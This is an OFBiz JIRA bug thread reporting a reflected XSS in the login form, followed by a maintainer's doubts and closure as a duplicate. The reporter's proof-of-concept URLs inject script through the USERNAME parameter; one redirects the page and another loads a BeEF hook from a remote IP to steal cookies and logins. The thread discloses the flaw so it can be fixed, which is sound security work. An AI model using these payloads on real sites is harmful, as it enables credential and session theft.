XSS vulnerability in OFBiz Login Form
-------------------------------------

                 Key: OFBIZ-1476
                 URL: https://issues.apache.org/jira/browse/OFBIZ-1476
             Project: OFBiz
          Issue Type: Bug
          Components: product
            Reporter: Emmanuel Saracco

Hi,

There is a Cross Site Scripting vulnerability in the OFBiz login form that allows an attacker to steal user's data.

PoC:

* Redirection to another site:
https://demo.hotwaxmedia.com/ecommerce/control/login?USERNAME=a%22%3E%3Cscript%3Edocument.location.href%3D%27http%3A%2F%2Fwww.bindshell.net%27%3B%3C%2Fscript%3E%3Ca+name%3D%22a
* BeEF injection:
https://demo.hotwaxmedia.com/catalog/control/login?USERNAME=a%22%3E%3Cscript%20language=%22javascript%22%20src=%22http://192.168.4.2/beef/hook/beefmagic.js.php%22%3E%3C/script%3E%3Ca%20name=%22a

Same thing using "PASSWORD" instead of "USERNAME".

Bye

[ https://issues.apache.org/jira/browse/OFBIZ-1476?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#action_12547550 ]

BJ Freeman commented on OFBIZ-1476:
-----------------------------------

I am not sure this is accurate. If you only put in a username or a password, the login fails:

The Following Errors Occurred: The Password was empty, please re-enter.

There is a statement in the status window about transferring data, but this is standard if you observe other pages when they are loading. It is not transferring data to another site, unless you have some data you have captured this way, in which case it would be nice to have a sample.

[ https://issues.apache.org/jira/browse/OFBIZ-1476?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#action_12547553 ]

Emmanuel Saracco commented on OFBIZ-1476:
-----------------------------------------

Hi,

Like for all XSS occurring in login forms, with the help of BeEF (or similar tools) the attacker will be able to steal cookies, capture the login/password re-entered by the user, etc.

It is as accurate as many other XSS vulnerabilities found on login forms. No more, no less. But it is so easy to patch that it can not hurt OFBiz code quality :-)

Bye

[ https://issues.apache.org/jira/browse/OFBIZ-1476?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#action_12547581 ]

BJ Freeman commented on OFBIZ-1476:
-----------------------------------

You seem knowledgeable, why not submit a patch?

[ https://issues.apache.org/jira/browse/OFBIZ-1476?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Jacques Le Roux closed OFBIZ-1476.
----------------------------------

    Resolution: Duplicate
      Assignee: Jacques Le Roux

OFBIZ-178

[ https://issues.apache.org/jira/browse/OFBIZ-1476?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#action_12547603 ]

jacques.le.roux edited comment on OFBIZ-1476 at 12/2/07 2:05 AM:
-----------------------------------------------------------------

Duplicate of OFBIZ-178

was (Author: jacques.le.roux):
OFBIZ-178